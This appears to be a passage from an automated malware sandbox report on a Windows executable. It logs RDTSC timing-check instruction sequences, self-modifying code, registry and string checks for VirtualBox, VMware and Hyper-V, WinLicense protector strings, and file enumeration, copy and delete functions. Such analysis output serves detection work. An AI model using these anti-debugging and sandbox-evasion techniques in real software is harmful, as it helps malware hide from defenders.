                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEE08A second address: CEE0C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 je 00007FBA68C246E4h 0x0000000d jmp 00007FBA68C246DEh 0x00000012 push eax 0x00000013 jc 00007FBA68C246D6h 0x00000019 pop eax 0x0000001a jg 00007FBA68C246DEh 0x00000020 popad 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 je 00007FBA68C246D6h 0x0000002a push edi 0x0000002b pop edi 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEE0C7 second address: CEE0E5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBA693F36B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FBA693F36BCh 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FBA693F36B6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEF78 second address: CEEF82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FBA68C246D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEF82 second address: CEEF8B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEF8B second address: CEEF91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEF91 second address: CEEF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEF9D second address: CEEFAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FBA68C246D6h 0x0000000a jnp 00007FBA68C246D6h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEFAE second address: CEEFB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF90FB second address: CF90FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF90FF second address: CF9111 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FBA693F36B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF9262 second address: CF9281 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBA68C246EAh 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D042D0 second address: D042D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D042D6 second address: D042DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D042DC second address: D042E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D03E87 second address: D03E8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D03E8B second address: D03E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0673B second address: D06741 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D06741 second address: D0675D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FBA693F36BEh 0x0000000c jc 00007FBA693F36BCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0BC6E second address: D0BC77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0BC77 second address: D0BC7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D193FE second address: D19402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19402 second address: D19435 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 jmp 00007FBA693F36C5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 jmp 00007FBA693F36BAh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19435 second address: D1944B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FBA68C246DFh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1944B second address: D19451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B12C second address: D1B132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B132 second address: D1B138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B138 second address: D1B143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1CA2A second address: D1CA35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1CA35 second address: D1CA5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBA68C246D6h 0x0000000a pop edi 0x0000000b jp 00007FBA68C246EAh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C8C6 second address: D1C8CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C8CA second address: D1C8D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C8D0 second address: D1C8D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D249F7 second address: D24A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FBA68C246DBh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D24A0A second address: D24A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA693F36C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D233A4 second address: D233A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D233A8 second address: D233AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D233AE second address: D233B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23675 second address: D2367A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2367A second address: D23680 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D246B2 second address: D246D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FBA693F36B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FBA693F36C5h 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27EC4 second address: D27ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3494B second address: D34950 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34950 second address: D34956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34956 second address: D34981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 ja 00007FBA693F36B6h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBA693F36C6h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34981 second address: D3498B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FBA68C246D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3498B second address: D3498F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3498F second address: D34995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37A93 second address: D37AB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jno 00007FBA693F36B6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f je 00007FBA693F36C2h 0x00000015 jnl 00007FBA693F36B6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D302AF second address: D302D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBA68C246D6h 0x0000000a popad 0x0000000b push esi 0x0000000c jmp 00007FBA68C246E3h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53950 second address: D53986 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push edi 0x00000009 jmp 00007FBA693F36C0h 0x0000000e pop edi 0x0000000f push edx 0x00000010 ja 00007FBA693F36B6h 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop edx 0x00000019 pushad 0x0000001a jmp 00007FBA693F36BFh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53986 second address: D5398E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53ACB second address: D53ADF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA693F36BEh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5407A second address: D5407E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D541CB second address: D541E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA693F36C4h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54340 second address: D5435D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBA68C246E1h 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5435D second address: D5436A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5875F second address: D58764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58764 second address: D5877A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBA693F36BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5877A second address: D5877F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58CFF second address: D58D10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA693F36BDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58D10 second address: D58D14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58D14 second address: D58D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jg 00007FBA693F36D3h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jmp 00007FBA693F36C9h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58D62 second address: D58D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58D66 second address: D58D89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FBA693F36C2h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A679 second address: D5A67E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A1CA second address: D5A1E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jne 00007FBA693F36B6h 0x0000000d jmp 00007FBA693F36C1h 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A1E9 second address: D5A208 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FBA68C246E9h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A208 second address: D5A223 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA693F36C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0578 second address: 52C059C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C059C second address: 52C05A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C05A0 second address: 52C05BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C064F second address: 52C0655 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0655 second address: 52C0681 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBA68C246E7h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0681 second address: 52C06E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FBA693F36BFh 0x00000008 pop esi 0x00000009 mov esi, edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 movzx ecx, bx 0x00000013 pushfd 0x00000014 jmp 00007FBA693F36BDh 0x00000019 sub ax, 3836h 0x0000001e jmp 00007FBA693F36C1h 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FBA693F36C8h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C06E1 second address: 52C06E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C06E5 second address: 52C06EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C804DD second address: C804E7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBA68C246DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C806FC second address: C80701 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: ACDB4C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: ACDC3F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C4CDEB instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C70B9C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: ACDBA4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CFEE32 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-39046
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_007F40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_007EE530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007E1710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_007F47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007EF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007F4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_007F3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_007EDB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_007EBE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_007EEE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007EDF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E1160 GetSystemInfo,ExitProcess,0_2_007E1160
                Source: file.exe, file.exe, 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2107101816.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2107101816.0000000001483000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2107101816.000000000143E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2107101816.00000000014A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW*
                Source: file.exe, 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37861
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37858
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37878
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37873
